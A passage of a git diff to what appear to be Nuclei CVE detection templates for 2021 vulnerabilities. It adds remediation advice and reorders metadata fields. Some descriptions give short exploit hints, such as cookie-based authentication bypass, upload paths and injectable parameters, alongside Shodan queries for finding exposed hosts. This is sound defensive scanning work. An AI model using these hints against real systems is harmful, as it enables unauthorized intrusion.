for CVE-2020-17530 (S2-061) was incomplete, meaning some of the tag's attributes could still perform a double evaluation if a developer applied forced OGNL evaluation by using the %{...} syntax. + remediation: Avoid using forced OGNL evaluation on untrusted user input, and/or upgrade to Struts 2.5.30 or greater which checks if expression evaluation won't lead to the double evaluation. reference: - https://cwiki.apache.org/confluence/display/WW/S2-062 - https://github.com/Axx8/Struts2_S2-062_CVE-2021-31805 - https://nvd.nist.gov/vuln/detail/CVE-2021-31805 - http://www.openwall.com/lists/oss-security/2022/04/12/6 - https://security.netapp.com/advisory/ntap-20220420-0001/ - remediation: Avoid using forced OGNL evaluation on untrusted user input, and/or upgrade to Struts 2.5.30 or greater which checks if expression evaluation won't lead to the double evaluation. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-31805 cwe-id: CWE-917 epss-score: 0.03276 - cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:* epss-percentile: 0.90017 + cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: apache diff --git a/http/cves/2021/CVE-2021-31856.yaml b/http/cves/2021/CVE-2021-31856.yaml index d58474bf46..03afede138 100644 --- a/http/cves/2021/CVE-2021-31856.yaml +++ b/http/cves/2021/CVE-2021-31856.yaml @@ -5,6 +5,8 @@ info: author: princechaddha severity: critical description: Layer5 Meshery 0.5.2 contains a SQL injection vulnerability in the REST API that allows an attacker to execute arbitrary SQL commands via the /experimental/patternfiles endpoint (order parameter in GetMesheryPatterns in models/meshery_pattern_persister.go). + remediation: | + Upgrade to a patched version of Layer5 Meshery or apply the necessary security patches to mitigate the SQL Injection vulnerability (CVE-2021-31856). reference: - https://github.com/ssst0n3/CVE-2021-31856 - https://nvd.nist.gov/vuln/detail/CVE-2021-31856 @@ -16,8 +18,8 @@ info: cve-id: CVE-2021-31856 cwe-id: CWE-89 epss-score: 0.05376 - cpe: cpe:2.3:a:layer5:meshery:0.5.2:*:*:*:*:*:*:* epss-percentile: 0.92134 + cpe: cpe:2.3:a:layer5:meshery:0.5.2:*:*:*:*:*:*:* metadata: max-request: 1 vendor: layer5 diff --git a/http/cves/2021/CVE-2021-31862.yaml b/http/cves/2021/CVE-2021-31862.yaml index 609e5ef4dc..794b9e60a8 100644 --- a/http/cves/2021/CVE-2021-31862.yaml +++ b/http/cves/2021/CVE-2021-31862.yaml @@ -5,6 +5,8 @@ info: author: jas37 severity: medium description: SysAid 20.4.74 contains a reflected cross-site scripting vulnerability via the KeepAlive.jsp stamp parameter. + remediation: | + Upgrade to a patched version of SysAid or apply the vendor-provided security patch to mitigate the XSS vulnerability. reference: - https://github.com/RobertDra/CVE-2021-31862/blob/main/README.md - https://www.sysaid.com/product/on-premise/latest-release @@ -15,8 +17,8 @@ info: cve-id: CVE-2021-31862 cwe-id: CWE-79 epss-score: 0.00141 - cpe: cpe:2.3:a:sysaid:sysaid:20.4.74:*:*:*:*:*:*:* epss-percentile: 0.49175 + cpe: cpe:2.3:a:sysaid:sysaid:20.4.74:*:*:*:*:*:*:* metadata: max-request: 1 vendor: sysaid diff --git a/http/cves/2021/CVE-2021-32030.yaml b/http/cves/2021/CVE-2021-32030.yaml index d31c4af2a7..382c44a562 100644 --- a/http/cves/2021/CVE-2021-32030.yaml +++ b/http/cves/2021/CVE-2021-32030.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: critical description: "ASUS GT-AC2900 devices before 3.0.0.4.386.42643 allows authentication bypass when processing remote input from an unauthenticated user, leading to unauthorized access to the administrator application. This relates to handle_request in router/httpd/httpd.c and auth_check in web_hook.o. An attacker-supplied value of '\0' matches the device's default value of '\0' in some situations." + remediation: | + Apply the latest firmware update provided by ASUS to fix the authentication bypass vulnerability (CVE-2021-32030). reference: - https://www.atredis.com/blog/2021/4/30/asus-authentication-bypass - https://nvd.nist.gov/vuln/detail/CVE-2021-32030 @@ -16,8 +18,8 @@ info: cve-id: CVE-2021-32030 cwe-id: CWE-287 epss-score: 0.66309 - cpe: cpe:2.3:o:asus:gt-ac2900_firmware:*:*:*:*:*:*:*:* epss-percentile: 0.97479 + cpe: cpe:2.3:o:asus:gt-ac2900_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: asus diff --git a/http/cves/2021/CVE-2021-32172.yaml b/http/cves/2021/CVE-2021-32172.yaml index 403fb125d3..6a6bb52daa 100644 --- a/http/cves/2021/CVE-2021-32172.yaml +++ b/http/cves/2021/CVE-2021-32172.yaml @@ -5,6 +5,8 @@ info: author: pdteam severity: critical description: Maian Cart 3.0 to 3.8 via the elFinder file manager plugin contains a remote code execution vulnerability. + remediation: | + Upgrade to a patched version of Maian Cart (>=3.8) to mitigate this vulnerability. reference: - https://dreyand.github.io/maian-cart-rce/ - https://github.com/DreyAnd/maian-cart-rce @@ -17,8 +19,8 @@ info: cve-id: CVE-2021-32172 cwe-id: CWE-862 epss-score: 0.20372 - cpe: cpe:2.3:a:maianscriptworld:maian_cart:3.8:*:*:*:*:*:*:* epss-percentile: 0.95712 + cpe: cpe:2.3:a:maianscriptworld:maian_cart:3.8:*:*:*:*:*:*:* metadata: max-request: 3 vendor: maianscriptworld diff --git a/http/cves/2021/CVE-2021-3223.yaml b/http/cves/2021/CVE-2021-3223.yaml index c9ec7fc560..b6b5310dce 100644 --- a/http/cves/2021/CVE-2021-3223.yaml +++ b/http/cves/2021/CVE-2021-3223.yaml @@ -5,6 +5,8 @@ info: author: gy741,pikpikcu severity: high description: NodeRED-Dashboard before 2.26.2 is vulnerable to local file inclusion because it allows ui_base/js/..%2f directory traversal to read files. + remediation: | + Upgrade Node RED Dashboard to version 2.26.2 or later to mitigate the vulnerability. reference: - https://github.com/node-red/node-red-dashboard/issues/669 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3223 @@ -16,16 +18,16 @@ info: cve-id: CVE-2021-3223 cwe-id: CWE-22 epss-score: 0.15641 - cpe: cpe:2.3:a:nodered:node-red-dashboard:*:*:*:*:*:node.js:*:* epss-percentile: 0.95204 + cpe: cpe:2.3:a:nodered:node-red-dashboard:*:*:*:*:*:node.js:*:* metadata: - max-request: 2 verified: true - shodan-query: title:"Node-RED" - fofa-query: title="Node-RED" - framework: node.js + max-request: 2 vendor: nodered product: node-red-dashboard + framework: node.js + shodan-query: title:"Node-RED" + fofa-query: title="Node-RED" tags: cve,cve2021,node-red-dashboard,lfi http: diff --git a/http/cves/2021/CVE-2021-32305.yaml b/http/cves/2021/CVE-2021-32305.yaml index 8fccd19266..a1a4178b70 100644 --- a/http/cves/2021/CVE-2021-32305.yaml +++ b/http/cves/2021/CVE-2021-32305.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: critical description: WebSVN before 2.6.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the search parameter. + remediation: | + Upgrade Websvn to version 2.6.1 or later to mitigate this vulnerability. reference: - https://packetstormsecurity.com/files/163225/Websvn-2.6.0-Remote-Code-Execution.html - https://github.com/websvnphp/websvn/pull/142 @@ -16,8 +18,8 @@ info: cve-id: CVE-2021-32305 cwe-id: CWE-78 epss-score: 0.96929 - cpe: cpe:2.3:a:websvn:websvn:*:*:*:*:*:*:*:* epss-percentile: 0.99602 + cpe: cpe:2.3:a:websvn:websvn:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: websvn diff --git a/http/cves/2021/CVE-2021-32618.yaml b/http/cves/2021/CVE-2021-32618.yaml index 99aa21b7bb..0806c53a60 100644 --- a/http/cves/2021/CVE-2021-32618.yaml +++ b/http/cves/2021/CVE-2021-32618.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: Python Flask-Security contains an open redirect vulnerability. Existing code validates that the URL specified in the next parameter is either relative or has the same network location as the requesting URL. Certain browsers accept and fill in the blanks of possibly incomplete or malformed URLs. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Upgrade to the latest version of Python Flask-Security library to fix the open redirect vulnerability. reference: - https://github.com/Flask-Middleware/flask-security/security/advisories/GHSA-6qmf-fj6m-686c - https://github.com/Flask-Middleware/flask-security/issues/486 @@ -15,8 +17,8 @@ info: cve-id: CVE-2021-32618 cwe-id: CWE-601 epss-score: 0.00104 - cpe: cpe:2.3:a:flask-security_project:flask-security:*:*:*:*:*:*:*:* epss-percentile: 0.41813 + cpe: cpe:2.3:a:flask-security_project:flask-security:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: flask-security_project diff --git a/http/cves/2021/CVE-2021-32682.yaml b/http/cves/2021/CVE-2021-32682.yaml index b264baa3cb..313ca44560 100644 --- a/http/cves/2021/CVE-2021-32682.yaml +++ b/http/cves/2021/CVE-2021-32682.yaml @@ -5,26 +5,26 @@ info: author: smaranchand severity: critical description: elFinder 2.1.58 is impacted by multiple remote code execution vulnerabilities that could allow an attacker to execute arbitrary code and commands on the server hosting the elFinder PHP connector, even with minimal configuration. + remediation: Update to elFinder 2.1.59 or later. As a workaround, ensure the connector is not exposed without authentication. reference: - https://smaranchand.com.np/2022/01/organization-vendor-application-security/ - https://blog.sonarsource.com/elfinder-case-study-of-web-file-manager-vulnerabilities - https://github.com/Studio-42/elFinder/security/advisories/GHSA-wph3-44rj-92pr - https://nvd.nist.gov/vuln/detail/CVE-2021-32682 - https://github.com/Studio-42/elFinder/commit/a106c350b7dfe666a81d6b576816db9fe0899b17 - remediation: Update to elFinder 2.1.59 or later. As a workaround, ensure the connector is not exposed without authentication. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-32682 cwe-id: CWE-22 epss-score: 0.96678 - cpe: cpe:2.3:a:std42:elfinder:*:*:*:*:*:*:*:* epss-percentile: 0.99486 + cpe: cpe:2.3:a:std42:elfinder:*:*:*:*:*:*:*:* metadata: max-request: 9 - github: https://github.com/Studio-42/elFinder vendor: std42 product: "elfinder" + github: https://github.com/Studio-42/elFinder tags: cve,cve2021,elfinder,misconfig,rce,oss http: diff --git a/http/cves/2021/CVE-2021-32789.yaml b/http/cves/2021/CVE-2021-32789.yaml index f53d1a947f..ef7007ade6 100644 --- a/http/cves/2021/CVE-2021-32789.yaml +++ b/http/cves/2021/CVE-2021-32789.yaml @@ -6,6 +6,8 @@ info: severity: high description: | woocommerce-gutenberg-products-block is a feature plugin for WooCommerce Gutenberg Blocks. An SQL injection vulnerability impacts all WooCommerce sites running the WooCommerce Blocks feature plugin between version 2.5.0 and prior to version 2.5.16. Via a carefully crafted URL, an exploit can be executed against the `wc/store/products/collection-data?calculate_attribute_counts[][taxonomy]` endpoint that allows the execution of a read only sql query. There are patches for many versions of this package, starting with version 2.5.16. There are no known workarounds aside from upgrading. + remediation: | + Update WooCommerce Blocks to version 5.6 or later to mitigate the vulnerability. reference: - https://woocommerce.com/posts/critical-vulnerability-detected-july-2021 - https://viblo.asia/p/phan-tich-loi-unauthen-sql-injection-woocommerce-naQZRQyQKvx @@ -18,13 +20,13 @@ info: cve-id: CVE-2021-32789 cwe-id: CWE-89 epss-score: 0.0942 - cpe: cpe:2.3:a:automattic:woocommerce_blocks:*:*:*:*:*:wordpress:*:* epss-percentile: 0.93944 + cpe: cpe:2.3:a:automattic:woocommerce_blocks:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: automattic product: woocommerce_blocks + framework: wordpress tags: cve,cve2021,wordpress,woocommerce,sqli,wp-plugin,wp,wpscan http: diff --git a/http/cves/2021/CVE-2021-32819.yaml b/http/cves/2021/CVE-2021-32819.yaml index 45767aa109..045b1a1370 100644 --- a/http/cves/2021/CVE-2021-32819.yaml +++ b/http/cves/2021/CVE-2021-32819.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Nodejs Squirrelly is susceptible to remote code execution. Squirrelly is a template engine implemented in JavaScript that works out of the box with ExpressJS. Squirrelly mixes pure template data with engine configuration options through the Express render API. By overwriting internal configuration options remote code execution may be triggered in downstream applications. There is currently no fix for these issues as of the publication of this CVE. The latest version of squirrelly is currently 8.0.8. For complete details refer to the referenced GHSL-2021-023. + remediation: | + Update to the latest version of Nodejs Squirrelly template engine to mitigate the vulnerability. reference: - https://securitylab.github.com/advisories/GHSL-2021-023-squirrelly/ - https://www.linuxlz.com/aqld/2331.html @@ -18,8 +20,8 @@ info: cve-id: CVE-2021-32819 cwe-id: CWE-200,NVD-CWE-noinfo epss-score: 0.886 - cpe: cpe:2.3:a:squirrelly:squirrelly:8.0.8:*:*:*:*:*:*:* epss-percentile: 0.98273 + cpe: cpe:2.3:a:squirrelly:squirrelly:8.0.8:*:*:*:*:*:*:* metadata: max-request: 1 vendor: squirrelly diff --git a/http/cves/2021/CVE-2021-32820.yaml b/http/cves/2021/CVE-2021-32820.yaml index 9b91b033e2..e710225e7a 100644 --- a/http/cves/2021/CVE-2021-32820.yaml +++ b/http/cves/2021/CVE-2021-32820.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDk severity: high description: Express-handlebars is susceptible to local file inclusion because it mixes pure template data with engine configuration options through the Express render API. More specifically, the layout parameter may trigger file disclosure vulnerabilities in downstream applications. This potential vulnerability is somewhat restricted in that only files with existing extensions (i.e., file.extension) can be included. Files that lack an extension will have .handlebars appended to them. For complete details refer to the referenced GHSL-2021-018 report. Notes in documentation have been added to help users avoid this potential information exposure vulnerability. + remediation: | + Update to the latest version of Express-handlebars to mitigate the vulnerability. reference: - https://securitylab.github.com/advisories/GHSL-2021-018-express-handlebars/ - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/CVE-2021-32820.json @@ -17,13 +19,13 @@ info: cve-id: CVE-2021-32820 cwe-id: CWE-200,CWE-94 epss-score: 0.00929 - cpe: cpe:2.3:a:express_handlebars_project:express_handlebars:*:*:*:*:*:node.js:*:* epss-percentile: 0.80999 + cpe: cpe:2.3:a:express_handlebars_project:express_handlebars:*:*:*:*:*:node.js:*:* metadata: max-request: 1 - framework: node.js vendor: express_handlebars_project product: express_handlebars + framework: node.js tags: cve,cve2021,expressjs,lfi,xxe http: diff --git a/http/cves/2021/CVE-2021-32853.yaml b/http/cves/2021/CVE-2021-32853.yaml index d089707d39..2219f3dbb9 100644 --- a/http/cves/2021/CVE-2021-32853.yaml +++ b/http/cves/2021/CVE-2021-32853.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: critical description: Erxes before 0.23.0 contains a cross-site scripting vulnerability. The value of topicID parameter is not escaped and is triggered in the enclosing script tag. + remediation: | + Upgrade to Erxes version 0.23.0 or later to mitigate the vulnerability. reference: - https://securitylab.github.com/advisories/GHSL-2021-103-erxes/ - https://nvd.nist.gov/vuln/detail/CVE-2021-3285 @@ -16,13 +18,13 @@ info: cve-id: CVE-2021-32853 cwe-id: CWE-79 epss-score: 0.0045 - cpe: cpe:2.3:a:erxes:erxes:*:*:*:*:*:*:*:* epss-percentile: 0.71943 + cpe: cpe:2.3:a:erxes:erxes:*:*:*:*:*:*:*:* metadata: max-request: 1 - shodan-query: http.title:"erxes" vendor: erxes product: erxes + shodan-query: http.title:"erxes" tags: cve,cve2021,xss,erxes,oss http: diff --git a/http/cves/2021/CVE-2021-3293.yaml b/http/cves/2021/CVE-2021-3293.yaml index ff0d4ff44c..7f728bc8c3 100644 --- a/http/cves/2021/CVE-2021-3293.yaml +++ b/http/cves/2021/CVE-2021-3293.yaml @@ -5,6 +5,8 @@ info: author: h1ei1 severity: medium description: emlog v5.3.1 is susceptible to full path disclosure via t/index.php, which allows an attacker to see the path to the webroot/file. + remediation: | + Apply the latest patch or upgrade to a version that fixes the vulnerability. reference: - https://github.com/emlog/emlog/issues/62 - https://github.com/thinkgad/Bugs/blob/main/emlog%20v5.3.1%20has%20Full%20Path%20Disclosure%20vulnerability.md @@ -15,8 +17,8 @@ info: cve-id: CVE-2021-3293 cwe-id: CWE-22 epss-score: 0.00226 - cpe: cpe:2.3:a:emlog:emlog:5.3.1:*:*:*:*:*:*:* epss-percentile: 0.60142 + cpe: cpe:2.3:a:emlog:emlog:5.3.1:*:*:*:*:*:*:* metadata: max-request: 1 vendor: emlog diff --git a/http/cves/2021/CVE-2021-3297.yaml b/http/cves/2021/CVE-2021-3297.yaml index 6dfaa8a293..d033cb5c54 100644 --- a/http/cves/2021/CVE-2021-3297.yaml +++ b/http/cves/2021/CVE-2021-3297.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: high description: Zyxel NBG2105 V1.00(AAGU.2)C0 devices are susceptible to authentication bypass vulnerabilities because setting the login cookie to 1 provides administrator access. + remediation: | + Apply the latest firmware update provided by Zyxel to fix the authentication bypass vulnerability. reference: - https://github.com/nieldk/vulnerabilities/blob/main/zyxel%20nbg2105/Admin%20bypass - https://www.zyxel.com/us/en/support/security_advisories.shtml @@ -16,8 +18,8 @@ info: cve-id: CVE-2021-3297 cwe-id: CWE-287 epss-score: 0.18886 - cpe: cpe:2.3:o:zyxel:nbg2105_firmware:v1.00\(aagu.2\)c0:*:*:*:*:*:*:* epss-percentile: 0.95572 + cpe: cpe:2.3:o:zyxel:nbg2105_firmware:v1.00\(aagu.2\)c0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: zyxel diff --git a/http/cves/2021/CVE-2021-33044.yaml b/http/cves/2021/CVE-2021-33044.yaml index 06607abbdd..a6f79e56cf 100644 --- a/http/cves/2021/CVE-2021-33044.yaml +++ b/http/cves/2021/CVE-2021-33044.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: critical description: Some Dahua products contain an authentication bypass during the login process. Attackers can bypass device identity authentication by constructing malicious data packets. + remediation: | + Apply the latest firmware update provided by Dahua to fix the authentication bypass vulnerability. reference: - https://github.com/dorkerdevil/CVE-2021-33044 - https://nvd.nist.gov/vuln/detail/CVE-2021-33044 @@ -16,8 +18,8 @@ info: cve-id: CVE-2021-33044 cwe-id: CWE-287 epss-score: 0.10344 - cpe: cpe:2.3:o:dahuasecurity:ipc-hum7xxx_firmware:*:*:*:*:*:*:*:* epss-percentile: 0.94217 + cpe: cpe:2.3:o:dahuasecurity:ipc-hum7xxx_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: dahuasecurity diff --git a/http/cves/2021/CVE-2021-33221.yaml b/http/cves/2021/CVE-2021-33221.yaml index 07ad1480f1..64d11d5962 100644 --- a/http/cves/2021/CVE-2021-33221.yaml +++ b/http/cves/2021/CVE-2021-33221.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: critical description: CommScope Ruckus IoT Controller is susceptible to information disclosure vulnerabilities because a 'service details' API endpoint discloses system and configuration information to an attacker without requiring authentication. This information includes DNS and NTP servers that the devices use for time and host resolution. It also includes the internal hostname and IoT Controller version. A fully configured device in production may leak other, more sensitive information (API keys and tokens). + remediation: | + Apply the latest security patches or updates provided by CommScope to mitigate the information disclosure vulnerability (CVE-2021-33221). reference: - https://www.commscope.com/globalassets/digizuite/917216-faq-security-advisory-id-20210525-v1-0.pdf - http://seclists.org/fulldisclosure/2021/May/72 @@ -16,8 +18,8 @@ info: cve-id: CVE-2021-33221 cwe-id: CWE-306 epss-score: 0.24628 - cpe: cpe:2.3:a:commscope:ruckus_iot_controller:*:*:*:*:*:*:*:* epss-percentile: 0.96022 + cpe: cpe:2.3:a:commscope:ruckus_iot_controller:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: commscope diff --git a/http/cves/2021/CVE-2021-33357.yaml b/http/cves/2021/CVE-2021-33357.yaml index 140abdc762..7408f7b8d9 100644 --- a/http/cves/2021/CVE-2021-33357.yaml +++ b/http/cves/2021/CVE-2021-33357.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | RaspAP 2.6 to 2.6.5 allows unauthenticated attackers to execute arbitrary OS commands via the "iface" GET parameter in /ajax/networking/get_netcfg.php, when the "iface" parameter value contains special characters such as ";". + remediation: | + Upgrade RaspAP to a version higher than 2.6.5 to mitigate the vulnerability. reference: - https://checkmarx.com/blog/chained-raspap-vulnerabilities-grant-root-level-access/ - https://gist.github.com/omriinbar/52c000c02a6992c6ce68d531195f69cf @@ -17,8 +19,8 @@ info: cve-id: CVE-2021-33357 cwe-id: CWE-78 epss-score: 0.96752 - cpe: cpe:2.3:a:raspap:raspap:*:*:*:*:*:*:*:* epss-percentile: 0.99515 + cpe: cpe:2.3:a:raspap:raspap:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: raspap diff --git a/http/cves/2021/CVE-2021-33544.yaml b/http/cves/2021/CVE-2021-33544.yaml index 2298b4e4f7..8c6a803e71 100644 --- a/http/cves/2021/CVE-2021-33544.yaml +++ b/http/cves/2021/CVE-2021-33544.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: high description: Geutebruck is susceptible to multiple vulnerabilities its web-based management interface that could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. + remediation: | + Apply the latest security patches or firmware updates provided by Geutebruck to mitigate the vulnerability. reference: - https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/ - https://www.randorisec.fr/fr/udp-technology-ip-camera-vulnerabilities/ @@ -16,8 +18,8 @@ info: cve-id: CVE-2021-33544 cwe-id: CWE-78 epss-score: 0.97529 - cpe: cpe:2.3:o:geutebrueck:g-cam_ebc-2110_firmware:*:*:*:*:*:*:*:* epss-percentile: 0.99982 + cpe: cpe:2.3:o:geutebrueck:g-cam_ebc-2110_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: geutebrueck diff --git a/http/cves/2021/CVE-2021-33564.yaml b/http/cves/2021/CVE-2021-33564.yaml index ee6289f866..62f4f79fff 100644 --- a/http/cves/2021/CVE-2021-33564.yaml +++ b/http/cves/2021/CVE-2021-33564.yaml @@ -5,6 +5,8 @@ info: author: 0xsapra severity: critical description: Ruby Dragonfly before 1.4.0 contains an argument injection vulnerability that allows remote attackers to read and write to arbitrary files via a crafted URL when the verify_url option is disabled. This may lead to code execution. The problem occurs because the generate and process features mishandle use of the ImageMagick convert utility. + remediation: | + Upgrade Ruby Dragonfly to version 1.4.0 or later to mitigate this vulnerability. reference: - https://zxsecurity.co.nz/research/argunment-injection-ruby-dragonfly/ - https://github.com/markevans/dragonfly/compare/v1.3.0...v1.4.0 @@ -17,13 +19,13 @@ info: cve-id: CVE-2021-33564 cwe-id: CWE-88 epss-score: 0.07998 - cpe: cpe:2.3:a:dragonfly_project:dragonfly:*:*:*:*:*:ruby:*:* epss-percentile: 0.9344 + cpe: cpe:2.3:a:dragonfly_project:dragonfly:*:*:*:*:*:ruby:*:* metadata: max-request: 2 - framework: ruby vendor: dragonfly_project product: dragonfly + framework: ruby tags: cve,cve2021,rce,ruby,injection http: diff --git a/http/cves/2021/CVE-2021-3374.yaml b/http/cves/2021/CVE-2021-3374.yaml index 4034cb40ab..9adf8bd14c 100644 --- a/http/cves/2021/CVE-2021-3374.yaml +++ b/http/cves/2021/CVE-2021-3374.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: medium description: Rstudio Shiny Server prior to 1.5.16 is vulnerable to local file inclusion and source code leakage. This can be exploited by appending an encoded slash to the URL. + remediation: | + Upgrade Rstudio Shiny Server to version 1.5.16 or later to mitigate the vulnerability. reference: - https://github.com/colemanjp/shinyserver-directory-traversal-source-code-leak - https://blog.rstudio.com/2021/01/13/shiny-server-1-5-16-update/ @@ -15,8 +17,8 @@ info: cve-id: CVE-2021-3374 cwe-id: CWE-22 epss-score: 0.00195 - cpe: cpe:2.3:a:rstudio:shiny_server:*:*:*:*:pro:*:*:* epss-percentile: 0.5653 + cpe: cpe:2.3:a:rstudio:shiny_server:*:*:*:*:pro:*:*:* metadata: max-request: 2 vendor: rstudio diff --git a/http/cves/2021/CVE-2021-3377.yaml b/http/cves/2021/CVE-2021-3377.yaml index 8c3e81057f..65aa75a401 100644 --- a/http/cves/2021/CVE-2021-3377.yaml +++ b/http/cves/2021/CVE-2021-3377.yaml @@ -5,24 +5,24 @@ info: author: geeknik severity: medium description: npm package ansi_up v4 is vulnerable to cross-site scripting because ANSI escape codes can be used to create HTML hyperlinks. + remediation: Upgrade to v5.0.0 or later. reference: - https://doyensec.com/resources/Doyensec_Advisory_ansi_up4_XSS.pdf - https://github.com/drudru/ansi_up/commit/c8c726ed1db979bae4f257b7fa41775155ba2e27 - https://nvd.nist.gov/vuln/detail/CVE-2021-3377 - remediation: Upgrade to v5.0.0 or later. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-3377 cwe-id: CWE-79 epss-score: 0.00116 - cpe: cpe:2.3:a:ansi_up_project:ansi_up:*:*:*:*:*:node.js:*:* epss-percentile: 0.44596 + cpe: cpe:2.3:a:ansi_up_project:ansi_up:*:*:*:*:*:node.js:*:* metadata: max-request: 1 - framework: node.js vendor: ansi_up_project product: ansi_up + framework: node.js tags: cve,cve2021,xss,npm http: diff --git a/http/cves/2021/CVE-2021-3378.yaml b/http/cves/2021/CVE-2021-3378.yaml index 7b33c9d1d0..53cf74486e 100644 --- a/http/cves/2021/CVE-2021-3378.yaml +++ b/http/cves/2021/CVE-2021-3378.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | FortiLogger 4.4.2.2 is affected by arbitrary file upload issues. Attackers can send a "Content-Type: image/png" header to Config/SaveUploadedHotspotLogoFile and then Assets/temp/hotspot/img/logohotspot.asp. + remediation: | + Apply the latest security patch or upgrade to a patched version of FortiLogger to mitigate this vulnerability. reference: - https://erberkan.github.io/2021/cve-2021-3378/ - https://github.com/erberkan/fortilogger_arbitrary_fileupload @@ -17,8 +19,8 @@ info: cve-id: CVE-2021-3378 cwe-id: CWE-434 epss-score: 0.18908 - cpe: cpe:2.3:a:fortilogger:fortilogger:*:*:*:*:*:*:*:* epss-percentile: 0.95576 + cpe: cpe:2.3:a:fortilogger:fortilogger:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: fortilogger diff --git a/http/cves/2021/CVE-2021-33807.yaml b/http/cves/2021/CVE-2021-33807.yaml index 9f42411e15..04c73677ff 100644 --- a/http/cves/2021/CVE-2021-33807.yaml +++ b/http/cves/2021/CVE-2021-33807.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: Cartadis Gespage through 8.2.1 allows Directory Traversal in gespage/doDownloadData and gespage/webapp/doDownloadData. + remediation: | + Apply the latest security patch or update provided by the vendor to fix the directory traversal vulnerability in Cartadis Gespage 8.2.1. reference: - https://www.on-x.com/sites/default/files/on-x_-_security_advisory_-_gespage_-_cve-2021-33807.pdf - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33807 @@ -17,8 +19,8 @@ info: cve-id: CVE-2021-33807 cwe-id: CWE-22 epss-score: 0.02433 - cpe: cpe:2.3:a:gespage:gespage:*:*:*:*:*:*:*:* epss-percentile: 0.88585 + cpe: cpe:2.3:a:gespage:gespage:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: gespage diff --git a/http/cves/2021/CVE-2021-33851.yaml b/http/cves/2021/CVE-2021-33851.yaml index 908be88e38..f5906d6c9f 100644 --- a/http/cves/2021/CVE-2021-33851.yaml +++ b/http/cves/2021/CVE-2021-33851.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Customize Login Image plugin prior to 3.5.3 contains a cross-site scripting vulnerability via the custom logo link on the Settings page. This can allow an attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Update to the latest version of the WordPress Customize Login Image plugin (3.5.3) to mitigate the vulnerability. reference: - https://wpscan.com/vulnerability/c67753fb-9111-453e-951f-854c6ce31203 - https://cybersecurityworks.com/zerodays/cve-2021-33851-stored-cross-site-scripting-in-wordpress-customize-login-image.html @@ -17,14 +19,14 @@ info: cve-id: CVE-2021-33851 cwe-id: CWE-79 epss-score: 0.00092 - cpe: cpe:2.3:a:apasionados:customize_login_image:3.4:*:*:*:*:wordpress:*:* epss-percentile: 0.3834 + cpe: cpe:2.3:a:apasionados:customize_login_image:3.4:*:*:*:*:wordpress:*:* metadata: - max-request: 4 verified: true - framework: wordpress + max-request: 4 vendor: apasionados product: customize_login_image + framework: wordpress tags: wpscan,cve2021,wordpress,customize-login-image,wp,authenticated,cve,wp-plugin,xss http: diff --git a/http/cves/2021/CVE-2021-33904.yaml b/http/cves/2021/CVE-2021-33904.yaml index fca48061b4..ae213b8b1b 100644 --- a/http/cves/2021/CVE-2021-33904.yaml +++ b/http/cves/2021/CVE-2021-33904.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: medium description: Accela Civic Platform through 21.1 contains a cross-site scripting vulnerability via the security/hostSignon.do parameter servProvCode. + remediation: | + Upgrade to a patched version of Accela Civic Platform (version >21.1) that includes proper input validation to mitigate the XSS vulnerability. reference: - https://www.exploit-db.com/exploits/49980 - https://gist.github.com/0xx7/3d934939d7122fe23db11bc48eda9d21 @@ -16,8 +18,8 @@ info: cve-id: CVE-2021-33904 cwe-id: CWE-79 epss-score: 0.00152 - cpe: cpe:2.3:a:accela:civic_platform:*:*:*:*:*:*:*:* epss-percentile: 0.5076 + cpe: cpe:2.3:a:accela:civic_platform:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: accela diff --git a/http/cves/2021/CVE-2021-34370.yaml b/http/cves/2021/CVE-2021-34370.yaml index 7bba239ebc..639b9ca05c 100644 --- a/http/cves/2021/CVE-2021-34370.yaml +++ b/http/cves/2021/CVE-2021-34370.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: Accela Civic Platform through 21.1 contains a cross-site scripting vulnerability via ssoAdapter/logoutAction.do successURL. + remediation: | + Upgrade to a patched version of Accela Civic Platform (version >21.1) that includes proper input validation and 